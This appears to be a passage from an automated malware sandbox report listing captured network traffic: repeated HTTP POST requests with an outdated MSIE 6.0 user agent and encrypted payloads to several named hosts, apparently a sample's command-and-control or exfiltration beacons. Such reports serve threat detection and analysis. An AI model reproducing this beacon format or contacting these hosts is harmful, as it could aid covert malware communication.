                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sclover3.comCache-Control: no-cacheData Raw: 39 42 71 64 44 6f 31 72 47 5a 76 58 6d 6c 58 71 42 4a 64 59 76 6b 62 58 6c 76 2f 37 65 51 45 6b 45 64 30 51 50 2f 7a 75 6e 53 62 50 35 57 4f 55 47 32 66 6e 78 49 77 46 69 6f 33 75 42 76 4b 45 79 35 73 5a 44 79 31 57 37 62 4c 46 39 45 35 6a 61 6d 67 63 48 54 6f 41 36 42 71 50 6d 30 64 4b 70 37 62 4c 6a 34 56 53 2f 56 75 44 68 4c 69 6f 64 4c 5a 75 73 32 58 4f 63 45 75 4e 35 43 43 62 5a 55 74 72 49 63 48 32 49 42 55 57 68 48 38 78 41 70 43 62 6a 72 52 7a 4a 7a 53 39 44 34 5a 75 66 51 4b 6a 4f 57 4b 34 4f 7a 41 71 71 7a 53 4f 38 66 45 65 6d 43 39 48 58 30 62 73 6e 46 65 4d 35 6e 77 64 4e 2b 6f 53 62 61 52 45 2f 37 57 65 4e 62 75 42 4a 38 77 58 6f 63 4b 6b 4f 4f 35 4b 76 61 38 6d 41 75 6b 52 7a 67 65 51 5a 77 68 31 4c 47 38 49 55 74 6b 58 36 71 74 31 5a 4c 4e 69 67 33 52 66 68 73 50 49 6d 4c 7a 48 63 6c 55 6a 62 39 75 64 36 58 4e 79 50 5a 67 6a 79 51 77 77 42 46 58 6a 36 44 69 78 62 56 54 46 61 66 63 59 4f 39 63 65 4c 4a 33 39 33 75 52 68 2b 78 73 42 4c 45 65 4a 30 65 6f 6a 33 63 5a 6b 4b 32 31 32 4d 52 2b 34 6c 33 5a 4d 49 57 69 38 6e 71 78 4e 70 63 34 74 32 65 33 4d 30 51 37 52 32 6f 4e 2f 39 6e 33 6e 49 2f 47 77 36 4c 4f 47 73 67 56 39 79 67 78 6e 57 79 4b 79 46 50 54 78 67 4b 44 57 55 4a 71 6f 56 4b 36 62 42 68 62 49 75 42 51 43 64 35 76 30 30 53 6c 66 33 36 79 76 56 6e 63 75 4b 49 5a 75 6c 79 77 65 59 63 35 71 65 53 37 4e 76 6d 62 62 4c 2f 67 6c 54 58 4d 71 78 57 31 64 71 30 4b 66 67 39 7a 4f 6b 67 32 68 68 6f 6c 51 55 52 31 39 71 79 61 64 56 35 56 44 5a 45 43 7a 73 42 4a 43 63 50 2b 68 67 30 50 39 2b 2f 2b 34 6f 51 50 54 39 64 47 2f 47 71 37 2b 52 39 48 76 62 73 49 54 6d 44 6a 75 79 47 7a 4a 51 53 4d 6c 57 64 42 55 79 58 72 59 68 35 53 6c 4a 45 6a 39 45 32 63 51 48 32 32 74 45 5a 75 37 6c 38 47 43 69 63 31 38 49 43 51 3d Data Ascii: 9BqdDo1rGZvXmlXqBJdYvkbXlv/7eQEkEd0QP/zunSbP5WOUG2fnxIwFio3uBvKEy5sZDy1W7bLF9E5jamgcHToA6BqPm0dKp7bLj4VS/VuDhLiodLZus2XOcEuN5CCbZUtrIcH2IBUWhH8xApCbjrRzJzS9D4ZufQKjOWK4OzAqqzSO8fEemC9HX0bsnFeM5nwdN+oSbaRE/7WeNbuBJ8wXocKkOO5Kva8mAukRzgeQZwh1LG8IUtkX6qt1ZLNig3RfhsPImLzHclUjb9ud6XNyPZgjyQwwBFXj6DixbVTFafcYO9ceLJ393uRh+xsBLEeJ0eoj3cZkK212MR+4l3ZMIWi8nqxNpc4t2e3M0Q7R2oN/9n3nI/Gw6LOGsgV9ygxnWyKyFPTxgKDWUJqoVK6bBhbIuBQCd5v00Slf36yvVncuKIZulyweYc5qeS7NvmbbL/glTXMqxW1dq0Kfg9zOkg2hholQUR19qyadV5VDZECzsBJCcP+hg0P9+/+4oQPT9dG/Gq7+R9HvbsITmDjuyGzJQSMlWdBUyXrYh5SlJEj9E2cQH22tEZu7l8GCic18ICQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 38 4b 52 31 35 6b 43 2b 4b 4a 75 69 65 4d 30 33 45 78 79 4f 37 58 50 44 6c 4c 63 6f 57 6a 4b 34 64 48 48 34 66 43 57 78 66 35 74 68 54 48 44 72 70 59 38 73 72 38 2b 74 50 64 48 78 56 51 30 5a 6b 51 68 45 72 57 30 52 4b 35 68 53 58 35 2f 66 67 55 33 77 4a 78 46 68 61 4d 6c 52 2b 46 33 43 6c 68 35 71 2f 79 51 64 71 4e 4c 61 6f 4d 51 49 6f 57 4d 75 4a 4a 7a 30 50 75 32 76 53 35 44 6b 72 37 6d 4b 68 39 55 55 4c 2f 59 33 37 48 58 79 51 79 69 6e 57 58 71 57 6b 51 4d 31 65 4e 78 64 68 66 4d 47 68 57 54 77 75 71 7a 63 65 42 47 62 2f 39 73 7a 54 44 6a 6f 6c 44 6a 4f 57 63 7a 34 4c 6b 4e 33 4f 78 78 73 37 69 36 4a 37 6b 73 6a 30 31 73 63 31 78 46 66 67 6a 52 6e 61 4b 6e 44 30 75 57 53 66 4f 51 2f 35 44 61 75 61 65 42 50 6e 2b 6d 48 30 64 52 4f 6f 55 6b 78 39 2b 45 6a 50 6e 68 41 42 45 76 75 36 48 48 4e 55 2b 6f 42 64 7a 55 70 4e 72 65 64 4c 4f 43 56 79 43 53 4e 4a 6f 64 37 43 42 5a 79 53 4b 2b 73 7a 30 61 59 37 34 73 31 43 4f 68 74 64 52 66 47 5a 61 31 34 64 78 41 6f 77 37 4d 72 32 7a 66 41 6f 47 61 49 67 6e 4c 64 61 46 6b 44 43 79 4d 5a 32 31 77 58 4d 63 35 73 49 71 34 56 7a 57 57 74 73 51 36 35 61 36 4f 67 72 65 4d 6b 58 72 58 42 77 66 66 57 69 61 34 61 6d 58 30 71 6b 6b 79 6e 45 38 50 71 47 34 54 36 72 53 55 49 41 51 78 4c 68 38 69 6b 49 74 78 78 76 67 6c 73 51 47 79 43 69 4e 75 67 71 55 57 4e 41 43 64 4f 4e 39 70 38 72 4d 57 41 44 4d 45 6f 39 56 74 76 58 72 4b 70 7a 51 4f 30 47 7a 44 31 33 6c 6e 57 75 53 5a 54 34 42 41 73 74 51 30 70 6b 4d 72 6b 77 47 45 30 35 78 6c 79 58 42 51 77 77 47 64 59 44 67 4b 6d 71 61 38 4a 72 33 62 42 37 74 4e 76 41 6b 57 4b 49 4a 67 4f 6c 51 34 53 37 6b 55 65 78 78 4e 62 4f 58 41 3d Data Ascii: 8KR15kC+KJuieM03ExyO7XPDlLcoWjK4dHH4fCWxf5thTHDrpY8sr8+tPdHxVQ0ZkQhErW0RK5hSX5/fgU3wJxFhaMlR+F3Clh5q/yQdqNLaoMQIoWMuJJz0Pu2vS5Dkr7mKh9UUL/Y37HXyQyinWXqWkQM1eNxdhfMGhWTwuqzceBGb/9szTDjolDjOWcz4LkN3Oxxs7i6J7ksj01sc1xFfgjRnaKnD0uWSfOQ/5DauaeBPn+mH0dROoUkx9+EjPnhABEvu6HHNU+oBdzUpNredLOCVyCSNJod7CBZySK+sz0aY74s1COhtdRfGZa14dxAow7Mr2zfAoGaIgnLdaFkDCyMZ21wXMc5sIq4VzWWtsQ65a6OgreMkXrXBwffWia4amX0qkkynE8PqG4T6rSUIAQxLh8ikItxxvglsQGyCiNugqUWNACdON9p8rMWADMEo9VtvXrKpzQO0GzD13lnWuSZT4BAstQ0pkMrkwGE05xlyXBQwwGdYDgKmqa8Jr3bB7tNvAkWKIJgOlQ4S7kUexxNbOXA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 4f 4c 36 39 41 73 66 31 66 35 67 67 36 6d 4f 4e 39 72 68 4b 39 35 44 76 70 4a 53 39 6f 5a 2b 79 36 37 31 4a 72 4c 6c 41 30 50 6c 51 70 53 30 32 6d 78 58 4e 68 41 77 31 56 63 44 2f 68 72 79 67 52 4a 4d 4a 59 6e 54 50 56 6c 4c 38 67 64 65 6b 50 74 56 4a 79 51 2b 6a 70 37 69 56 54 47 44 4b 6d 66 61 41 53 54 52 43 59 57 37 47 31 58 57 6a 4b 2b 58 2f 39 67 49 76 6e 36 74 67 36 50 39 46 35 73 5a 33 6f 6a 58 69 62 32 6b 32 78 62 70 6c 4a 31 6d 50 76 55 77 4c 38 33 53 67 61 46 6b 4e 2f 61 6f 74 2f 2b 79 58 46 76 4d 49 63 47 54 7a 77 41 71 48 42 36 56 48 6b 49 57 32 4d 72 74 6d 78 4d 34 5a 74 36 38 6d 79 35 30 35 51 68 64 49 4c 4e 4a 62 35 2f 63 6e 79 6b 6d 34 55 2f 75 4d 6f 58 38 74 42 65 49 73 2f 79 66 32 51 47 71 70 57 66 71 4b 62 6e 75 72 4e 76 4f 65 4e 62 75 77 67 44 45 72 41 44 78 7a 52 33 6b 62 63 6c 36 63 6d 78 68 43 62 68 71 44 42 6e 31 2b 58 78 49 65 77 33 5a 38 4f 36 4c 48 76 59 58 6a 6e 72 68 55 72 6a 47 52 39 4e 70 78 61 66 38 30 6a 48 6e 76 6c 6f 39 62 61 38 79 6e 4f 65 78 65 7a 50 62 64 4a 47 6e 46 53 6f 63 72 45 4e 65 55 4c 69 78 6f 45 48 67 66 70 6d 6e 51 78 36 66 72 59 64 2b 74 2b 42 4f 6d 55 31 75 42 2f 66 67 48 73 33 53 4d 79 43 30 48 57 6d 57 78 67 67 58 6d 54 46 52 53 45 4b 34 55 48 59 56 72 54 59 37 4c 51 36 4e 42 2f 79 73 2b 4d 6e 7a 37 39 31 46 51 55 45 4f 43 2b 41 5a 49 61 4b 75 4c 47 70 59 6e 46 37 55 38 56 64 72 6b 77 7a 56 6b 72 30 4e 6c 4b 51 58 59 51 75 37 47 69 53 6e 45 45 50 4c 2b 4e 52 63 6d 4c 33 71 4c 43 66 37 49 77 4f 75 35 55 52 6d 44 52 31 44 68 37 4f 56 4f 65 6a 34 58 6d 5a 6c 4d 77 50 64 35 45 52 47 44 58 53 4e 36 59 77 48 65 6d 6e 41 68 59 64 75 6b 6e 6b 62 33 63 6c 69 59 58 71 6f 58 35 55 46 49 75 47 71 4a 55 71 72 75 57 79 76 30 64 33 30 47 35 71 74 58 Data Ascii: OL69Asf1f5gg6mON9rhK95DvpJS9oZ+y671JrLlA0PlQpS02mxXNhAw1VcD/hrygRJMJYnTPVlL8gdekPtVJyQ+jp7iVTGDKmfaASTRCYW7G1XWjK+X/9gIvn6tg6P9F5sZ3ojXib2k2xbplJ1mPvUwL83SgaFkN/aot/+yXFvMIcGTzwAqHB6VHkIW2MrtmxM4Zt68my505QhdILNJb5/cnykm4U/uMoX8tBeIs/yf2QGqpWfqKbnurNvOeNbuwgDErADxzR3kbcl6cmxhCbhqDBn1+XxIew3Z8O6LHvYXjnrhUrjGR9Npxaf80jHnvlo9ba8ynOexezPbdJGnFSocrENeULixoEHgfpmnQx6frYd+t+BOmU1uB/fgHs3SMyC0HWmWxggXmTFRSEK4UHYVrTY7LQ6NB/ys+Mnz791FQUEOC+AZIaKuLGpYnF7U8VdrkwzVkr0NlKQXYQu7GiSnEEPL+NRcmL3qLCf7IwOu5URmDR1Dh7OVOej4XmZlMwPd5ERGDXSN6YwHemnAhYduknkb3cliYXqoX5UFIuGqJUqruWyv0d30G5qtX
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 64 50 34 43 76 34 6a 47 4c 35 73 5a 61 51 6a 6b 79 7a 67 2b 69 76 73 61 38 34 6f 51 76 43 53 58 50 4e 70 31 53 79 69 77 75 64 6b 4b 68 4c 33 63 6c 30 45 43 54 6f 7a 62 68 6a 74 31 5a 75 57 56 6d 2b 76 6b 55 71 33 57 4c 76 59 72 4e 62 32 6a 51 76 6a 53 37 6c 34 63 38 7a 4f 4b 44 44 30 63 59 2f 6c 47 77 67 38 6b 43 34 2f 42 32 4c 4b 41 4e 47 45 51 30 59 31 4a 6b 2b 63 2b 63 44 54 33 32 77 63 66 69 59 53 77 4a 58 54 73 45 37 38 7a 69 73 64 49 73 49 6e 39 32 31 37 59 59 64 70 4b 79 6b 6c 30 39 34 6c 51 4b 44 4f 52 33 6d 55 2b 58 56 71 57 4d 6f 58 55 6f 59 49 51 58 31 32 4b 46 7a 44 2f 52 53 77 56 65 41 32 31 62 65 75 45 2b 30 4e 2f 36 6e 62 62 64 50 61 2f 54 6d 51 48 5a 72 35 4c 4a 5a 41 41 39 51 67 31 73 4b 55 68 72 6b 35 61 6a 76 74 6e 34 57 2f 49 57 4d 33 70 76 46 42 59 63 74 33 6e 39 41 53 6e 64 58 48 69 61 6a 4e 66 78 63 68 66 45 51 72 51 67 31 37 48 37 35 67 7a 6e 6e 67 4c 73 55 68 43 39 76 45 39 77 39 69 55 54 39 6b 77 4c 31 32 4f 4a 76 44 70 34 4c 34 57 54 46 51 4e 4b 76 57 6d 64 52 57 59 73 54 32 59 43 77 36 54 77 6d 4f 78 33 70 67 72 50 61 65 7a 74 69 4c 5a 76 36 4c 4b 55 65 59 39 7a 75 55 6e 4b 39 30 6e 68 2f 4c 46 76 57 30 54 32 47 37 36 74 4e 63 39 4d 4c 6c 50 4a 43 4c 65 59 6f 5a 56 62 43 44 69 44 44 7a 46 47 59 4a 4b 2b 2b 46 39 41 37 72 66 66 75 50 45 4a 71 46 4e 59 4d 4d 43 4a 74 67 69 71 55 39 6c 4f 35 6a 5a 59 56 68 41 50 54 4c 52 46 66 4e 66 49 37 4c 44 62 79 4e 71 31 61 42 32 69 70 5a 6c 72 35 42 4e 59 42 75 6d 54 47 42 42 79 71 4d 49 33 57 76 67 4f 71 6a 35 4b 73 50 58 54 49 69 6e 55 74 6a 71 54 53 68 75 6b 74 36 6c 5a 6a 46 73 5a 70 5a 5a 34 55 6c 52 47 67 59 4f 6a 54 73 62 Data Ascii: dP4Cv4jGL5sZaQjkyzg+ivsa84oQvCSXPNp1SyiwudkKhL3cl0ECTozbhjt1ZuWVm+vkUq3WLvYrNb2jQvjS7l4c8zOKDD0cY/lGwg8kC4/B2LKANGEQ0Y1Jk+c+cDT32wcfiYSwJXTsE78zisdIsIn9217YYdpKykl094lQKDOR3mU+XVqWMoXUoYIQX12KFzD/RSwVeA21beuE+0N/6nbbdPa/TmQHZr5LJZAA9Qg1sKUhrk5ajvtn4W/IWM3pvFBYct3n9ASndXHiajNfxchfEQrQg17H75gznngLsUhC9vE9w9iUT9kwL12OJvDp4L4WTFQNKvWmdRWYsT2YCw6TwmOx3pgrPaeztiLZv6LKUeY9zuUnK90nh/LFvW0T2G76tNc9MLlPJCLeYoZVbCDiDDzFGYJK++F9A7rffuPEJqFNYMMCJtgiqU9lO5jZYVhAPTLRFfNfI7LDbyNq1aB2ipZlr5BNYBumTGBByqMI3WvgOqj5KsPXTIinUtjqTShukt6lZjFsZpZZ4UlRGgYOjTsb
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 55 36 6b 46 6e 6a 45 46 4e 35 73 56 75 30 30 6c 55 4c 77 55 6a 49 6f 77 4f 41 35 76 6a 76 39 49 39 64 37 37 5a 31 59 2f 32 66 4c 6a 63 66 32 56 51 58 6a 46 32 36 53 6b 44 76 6b 63 39 6d 47 72 41 72 50 30 54 38 45 49 78 4c 62 69 32 38 63 4a 6d 68 39 63 2b 6f 68 38 79 67 56 5a 74 71 39 73 57 6f 66 2f 57 32 73 42 32 63 56 37 67 56 37 43 54 70 4b 42 53 4b 6a 47 45 6e 72 66 52 2f 79 55 7a 4f 2b 67 70 7a 71 49 45 69 5a 50 2b 55 7a 4a 30 51 71 52 41 6d 49 47 6a 51 76 71 67 31 6a 64 49 6e 6b 47 67 39 44 6f 78 70 73 36 6f 53 30 64 58 50 41 75 33 2f 42 71 57 67 62 2b 58 44 63 4b 70 51 70 49 45 77 62 52 54 66 37 56 7a 4f 58 79 63 78 76 77 43 78 49 32 71 70 34 6d 65 53 6e 4c 47 6d 4c 51 2f 57 4a 59 43 45 78 76 33 46 33 58 78 48 44 53 5a 54 66 62 43 53 52 4b 59 76 6d 76 79 33 37 78 68 55 41 57 72 38 37 6b 4a 38 47 6c 49 4f 76 5a 56 65 77 31 5a 36 50 71 68 49 6a 31 78 4e 2b 44 35 68 2b 45 7a 72 51 74 2b 37 43 49 53 50 2b 74 52 66 4a 4c 76 6a 4d 6f 30 6a 69 48 4c 56 34 35 4a 38 56 59 50 76 59 46 68 59 50 73 49 57 63 2f 33 30 48 32 58 50 57 33 76 59 31 34 42 61 57 32 41 70 67 33 62 51 64 2f 77 5a 31 7a 77 48 42 45 72 6a 47 58 35 6f 63 34 51 75 55 44 54 4e 79 50 65 4b 54 75 52 54 55 64 7a 42 30 56 51 50 36 77 66 53 74 77 45 74 6c 6f 56 55 35 61 6b 6c 44 41 64 34 39 59 47 36 34 4b 4d 43 61 68 46 31 77 44 55 64 37 67 55 6e 45 42 50 6f 32 77 72 46 44 56 57 48 4e 73 58 4a 50 72 41 41 39 34 69 38 36 2b 33 70 71 37 42 34 4d 54 4b 31 36 46 48 74 4f 5a 4f 65 7a 35 38 31 75 66 52 64 69 6f 6e 6d 64 41 39 49 64 4e 30 6d 58 4a 4d 67 36 4f 74 2f 79 68 51 39 47 38 69 7a 4b 72 56 6c 33 46 4b 4a 64 67 4b 6f 33 6b 6e 36 56 45 61 6b 46 63 65 6e 59 46 7a 30 74 45 48 6f 51 3d Data Ascii: U6kFnjEFN5sVu00lULwUjIowOA5vjv9I9d77Z1Y/2fLjcf2VQXjF26SkDvkc9mGrArP0T8EIxLbi28cJmh9c+oh8ygVZtq9sWof/W2sB2cV7gV7CTpKBSKjGEnrfR/yUzO+gpzqIEiZP+UzJ0QqRAmIGjQvqg1jdInkGg9Doxps6oS0dXPAu3/BqWgb+XDcKpQpIEwbRTf7VzOXycxvwCxI2qp4meSnLGmLQ/WJYCExv3F3XxHDSZTfbCSRKYvmvy37xhUAWr87kJ8GlIOvZVew1Z6PqhIj1xN+D5h+EzrQt+7CISP+tRfJLvjMo0jiHLV45J8VYPvYFhYPsIWc/30H2XPW3vY14BaW2Apg3bQd/wZ1zwHBErjGX5oc4QuUDTNyPeKTuRTUdzB0VQP6wfStwEtloVU5aklDAd49YG64KMCahF1wDUd7gUnEBPo2wrFDVWHNsXJPrAA94i86+3pq7B4MTK16FHtOZOez581ufRdionmdA9IdN0mXJMg6Ot/yhQ9G8izKrVl3FKJdgKo3kn6VEakFcenYFz0tEHoQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 55 36 6b 46 6e 6a 45 46 4e 35 73 56 75 30 30 6c 55 4c 77 55 6a 49 6f 77 4f 41 35 76 6a 76 39 49 39 64 37 37 5a 31 59 2f 32 66 4c 6a 63 66 32 56 51 58 6a 46 32 36 53 6b 44 76 6b 63 39 6d 47 72 41 72 50 30 54 38 45 49 78 4c 62 69 32 38 63 4a 6d 68 39 63 2b 6f 68 38 79 67 56 5a 74 71 39 73 57 6f 66 2f 57 32 73 42 32 63 56 37 67 56 37 43 54 70 4b 42 53 4b 6a 47 45 6e 72 66 52 2f 79 55 7a 4f 2b 67 70 7a 71 49 45 69 5a 50 2b 55 7a 4a 30 51 71 52 41 6d 49 47 6a 51 76 71 67 31 6a 64 49 6e 6b 47 67 39 44 6f 78 70 73 36 6f 53 30 64 58 50 41 75 33 2f 42 71 57 67 62 2b 58 44 63 4b 70 51 70 49 45 77 62 52 54 66 37 56 7a 4f 58 79 63 78 76 77 43 78 49 32 71 70 34 6d 65 53 6e 4c 47 6d 4c 51 2f 57 4a 59 43 45 78 76 33 46 33 58 78 48 44 53 5a 54 66 62 43 53 52 4b 59 76 6d 76 79 33 37 78 68 55 41 57 72 38 37 6b 4a 38 47 6c 49 4f 76 5a 56 65 77 31 5a 36 50 71 68 49 6a 31 78 4e 2b 44 35 68 2b 45 7a 72 51 74 2b 37 43 49 53 50 2b 74 52 66 4a 4c 76 6a 4d 6f 30 6a 69 48 4c 56 34 35 4a 38 56 59 50 76 59 46 68 59 50 73 49 57 63 2f 33 30 48 32 58 50 57 33 76 59 31 34 42 61 57 32 41 70 67 33 62 51 64 2f 77 5a 31 7a 77 48 42 45 72 6a 47 58 35 6f 63 34 51 75 55 44 54 4e 79 50 65 4b 54 75 52 54 55 64 7a 42 30 56 51 50 36 77 66 53 74 77 45 74 6c 6f 56 55 35 61 6b 6c 44 41 64 34 39 59 47 36 34 4b 4d 43 61 68 46 31 77 44 55 64 37 67 55 6e 45 42 50 6f 32 77 72 46 44 56 57 48 4e 73 58 4a 50 72 41 41 39 34 69 38 36 2b 33 70 71 37 42 34 4d 54 4b 31 36 46 48 74 4f 5a 4f 65 7a 35 38 31 75 66 52 64 69 6f 6e 6d 64 41 39 49 64 4e 30 6d 58 4a 4d 67 36 4f 74 2f 79 68 51 39 47 38 69 7a 4b 72 56 6c 33 46 4b 4a 64 67 4b 6f 33 6b 6e 36 56 45 61 6b 46 63 65 6e 59 46 7a 30 74 45 48 6f 51 3d Data Ascii: U6kFnjEFN5sVu00lULwUjIowOA5vjv9I9d77Z1Y/2fLjcf2VQXjF26SkDvkc9mGrArP0T8EIxLbi28cJmh9c+oh8ygVZtq9sWof/W2sB2cV7gV7CTpKBSKjGEnrfR/yUzO+gpzqIEiZP+UzJ0QqRAmIGjQvqg1jdInkGg9Doxps6oS0dXPAu3/BqWgb+XDcKpQpIEwbRTf7VzOXycxvwCxI2qp4meSnLGmLQ/WJYCExv3F3XxHDSZTfbCSRKYvmvy37xhUAWr87kJ8GlIOvZVew1Z6PqhIj1xN+D5h+EzrQt+7CISP+tRfJLvjMo0jiHLV45J8VYPvYFhYPsIWc/30H2XPW3vY14BaW2Apg3bQd/wZ1zwHBErjGX5oc4QuUDTNyPeKTuRTUdzB0VQP6wfStwEtloVU5aklDAd49YG64KMCahF1wDUd7gUnEBPo2wrFDVWHNsXJPrAA94i86+3pq7B4MTK16FHtOZOez581ufRdionmdA9IdN0mXJMg6Ot/yhQ9G8izKrVl3FKJdgKo3kn6VEakFcenYFz0tEHoQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 64 50 34 43 76 34 6a 47 4c 35 73 5a 61 51 6a 6b 79 7a 67 2b 69 76 73 61 38 34 6f 51 76 43 53 58 50 4e 70 31 53 79 69 77 75 64 6b 4b 68 4c 33 63 6c 30 45 43 54 6f 7a 62 68 6a 74 31 5a 75 57 56 6d 2b 76 6b 55 71 33 57 4c 76 59 72 4e 62 32 6a 51 76 6a 53 37 6c 34 63 38 7a 4f 4b 44 44 30 63 59 2f 6c 47 77 67 38 6b 43 34 2f 42 32 4c 4b 41 4e 47 45 51 30 59 31 4a 6b 2b 63 2b 63 44 54 33 32 77 63 66 69 59 53 77 4a 58 54 73 45 37 38 7a 69 73 64 49 73 49 6e 39 32 31 37 59 59 64 70 4b 79 6b 6c 30 39 34 6c 51 4b 44 4f 52 33 6d 55 2b 58 56 71 57 4d 6f 58 55 6f 59 49 51 58 31 32 4b 46 7a 44 2f 52 53 77 56 65 41 32 31 62 65 75 45 2b 30 4e 2f 36 6e 62 62 64 50 61 2f 54 6d 51 48 5a 72 35 4c 4a 5a 41 41 39 51 67 31 73 4b 55 68 72 6b 35 61 6a 76 74 6e 34 57 2f 49 57 4d 33 70 76 46 42 59 63 74 33 6e 39 41 53 6e 64 58 48 69 61 6a 4e 66 78 63 68 66 45 51 72 51 67 31 37 48 37 35 67 7a 6e 6e 67 4c 73 55 68 43 39 76 45 39 77 39 69 55 54 39 6b 77 4c 31 32 4f 4a 76 44 70 34 4c 34 57 54 46 51 4e 4b 76 57 6d 64 52 57 59 73 54 32 59 43 77 36 54 77 6d 4f 78 33 70 67 72 50 61 65 7a 74 69 4c 5a 76 36 4c 4b 55 65 59 39 7a 75 55 6e 4b 39 30 6e 68 2f 4c 46 76 57 30 54 32 47 37 36 74 4e 63 39 4d 4c 6c 50 4a 43 4c 65 59 6f 5a 56 62 43 44 69 44 44 7a 46 47 59 4a 4b 2b 2b 46 39 41 37 72 66 66 75 50 45 4a 71 46 4e 59 4d 4d 43 4a 74 67 69 71 55 39 6c 4f 35 6a 5a 59 56 68 41 50 54 4c 52 46 66 4e 66 49 37 4c 44 62 79 4e 71 31 61 42 32 69 70 5a 6c 72 35 42 4e 59 42 75 6d 54 47 42 42 79 71 4d 49 33 57 76 67 4f 71 6a 35 4b 73 50 58 54 49 69 6e 55 74 6a 71 54 53 68 75 6b 74 36 6c 5a 6a 46 73 5a 70 5a 5a 34 55 6c 52 47 67 59 4f 6a 54 73 62 Data Ascii: dP4Cv4jGL5sZaQjkyzg+ivsa84oQvCSXPNp1SyiwudkKhL3cl0ECTozbhjt1ZuWVm+vkUq3WLvYrNb2jQvjS7l4c8zOKDD0cY/lGwg8kC4/B2LKANGEQ0Y1Jk+c+cDT32wcfiYSwJXTsE78zisdIsIn9217YYdpKykl094lQKDOR3mU+XVqWMoXUoYIQX12KFzD/RSwVeA21beuE+0N/6nbbdPa/TmQHZr5LJZAA9Qg1sKUhrk5ajvtn4W/IWM3pvFBYct3n9ASndXHiajNfxchfEQrQg17H75gznngLsUhC9vE9w9iUT9kwL12OJvDp4L4WTFQNKvWmdRWYsT2YCw6TwmOx3pgrPaeztiLZv6LKUeY9zuUnK90nh/LFvW0T2G76tNc9MLlPJCLeYoZVbCDiDDzFGYJK++F9A7rffuPEJqFNYMMCJtgiqU9lO5jZYVhAPTLRFfNfI7LDbyNq1aB2ipZlr5BNYBumTGBByqMI3WvgOqj5KsPXTIinUtjqTShukt6lZjFsZpZZ4UlRGgYOjTsb
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 6c 59 73 31 39 49 46 78 53 70 76 48 5a 6c 73 51 59 42 77 4a 33 6c 70 78 64 2f 66 2f 65 46 6d 70 52 61 43 49 2b 32 59 4b 32 74 6c 76 72 5a 6b 6a 50 4e 56 70 47 58 79 31 7a 51 45 44 72 79 76 6f 62 72 32 41 4c 72 44 42 76 50 62 79 7a 45 30 78 64 68 58 4f 69 36 77 68 78 69 52 38 38 7a 58 66 30 4d 47 49 39 35 48 52 66 32 32 43 68 6e 75 4d 48 62 73 6e 54 59 50 55 53 32 4b 72 33 4d 67 35 34 6b 6b 72 46 75 4a 4c 69 69 38 4e 32 6f 56 49 44 6b 48 4f 47 69 35 41 4c 71 32 74 31 79 42 52 39 48 44 39 61 78 2f 51 69 35 47 45 75 37 64 33 76 59 51 35 69 57 6f 6a 41 4c 4e 50 6d 48 52 35 73 48 4f 79 61 61 33 62 4c 31 35 32 37 6f 4f 43 33 45 52 74 6b 55 39 6a 55 46 58 58 79 39 37 70 76 75 4a 54 39 54 45 30 33 38 57 73 73 76 65 53 52 41 52 67 52 33 38 6b 4f 38 72 77 35 70 61 74 70 76 50 2f 46 67 77 4d 4c 69 69 53 6d 47 39 30 6a 62 76 32 72 38 58 72 67 68 74 67 78 4e 51 66 56 54 44 36 35 66 2b 37 62 31 36 2b 6f 46 34 44 57 73 61 79 72 57 66 2b 5a 62 48 52 44 39 61 64 2f 4b 45 51 7a 6e 48 4c 45 67 6e 39 45 79 4c 6d 68 4b 36 6e 74 6f 2b 39 6d 55 41 4a 45 4b 42 48 58 50 72 33 52 37 45 6b 71 36 37 58 5a 4a 4f 70 41 44 34 6c 6d 43 74 77 44 67 74 63 44 7a 36 56 4c 6f 37 55 35 47 4e 6d 55 63 39 33 65 74 6d 52 69 6e 55 77 68 7a 69 47 61 31 57 32 38 6f 64 66 33 4e 47 65 32 69 53 47 61 31 47 72 30 6e 79 53 39 39 32 78 78 55 6b 35 70 51 48 64 32 6b 61 65 31 62 4a 59 4c 47 6c 62 4c 54 54 70 76 4c 34 4e 35 4b 4b 73 6f 34 59 43 4f 78 50 48 42 55 47 62 34 76 61 71 46 49 37 52 31 6c 31 62 52 4c 70 71 4a 38 51 2f 55 47 71 57 57 63 33 71 4d 34 32 6f 42 44 34 2b 56 45 5a 2b 43 7a 6b 31 2b 4f 6e 63 7a 36 37 65 4a 57 45 38 68 71 4d 72 4c 74 45 3d Data Ascii: 